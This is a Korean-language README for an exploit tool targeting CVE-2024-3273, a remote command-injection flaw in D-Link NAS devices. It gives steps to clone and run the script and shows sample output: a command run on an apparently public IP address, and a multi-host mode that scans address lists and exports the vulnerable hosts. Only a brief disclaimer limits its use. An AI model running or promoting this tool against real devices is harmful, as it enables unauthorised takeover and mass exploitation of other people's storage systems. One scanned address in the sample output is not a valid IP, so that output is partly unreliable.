
CVE-2024-3273에 대한 익스플로잇, 단일 및 다중 호스트 지원
이 저장소는 D-Link NAS 장치에서 발견된 보안 취약점 CVE-2024-3273에 대한 개념 증명(PoC)을 포함합니다. 이 취약점을 통해 공격자는 취약한 장치에서 임의의 명령을 실행할 수 있습니다.
CVE-2024-3273은 D-Link NAS 장치의 취약점으로, 원격 공격자가 cgi-bin/nas_sharing.cgi 엔드포인트에 조작된 HTTP 요청을 통해 임의의 명령을 실행할 수 있게 합니다.
이 PoC는 취약점을 악용하여 취약한 D-Link NAS 장치에서 명령을 실행하는 방법을 보여줍니다.
requests 라이브러리이 저장소를 클론합니다:
git clone https://github.com/adhikara13/CVE-2024-3273.git
저장소 디렉토리로 이동합니다:
cd CVE-2024-3273
PoC를 실행합니다:
python main.py
화면의 지시에 따라 대상 장치를 선택합니다:
host:port 형식으로 제공하고, 취약한 호스트를 vulnerables.txt로 내보낼지 선택합니다.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
옵션을 선택하세요 (1: 단일 호스트, 2: 다중 호스트): 1
호스트 입력: 114.32.179.200
실행할 명령 입력: ls
114.32.179.200의 응답:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
옵션을 선택하세요 (1: 단일 호스트, 2: 다중 호스트): 2
호스트 목록이 포함된 파일 경로 입력: list.txt
취약한 호스트를 vulnerables.txt로 내보내시겠습니까? (y/n): y
호스트 87.205.188.21:9290에 대한 연결 오류.
호스트 186.212.112.141:8081에 대한 연결 오류.
호스트 124.120.263.149:8032가 취약합니다.
이 PoC는 교육 및 연구 목적으로만 제공됩니다. 책임감 있게 사용하고, 테스트할 권한이 있는 장치에서만 사용하십시오.
기여를 환영합니다! 문제점이나 개선 사항을 발견하시면 이슈를 열거나 풀 리퀘스트를 생성해 주세요.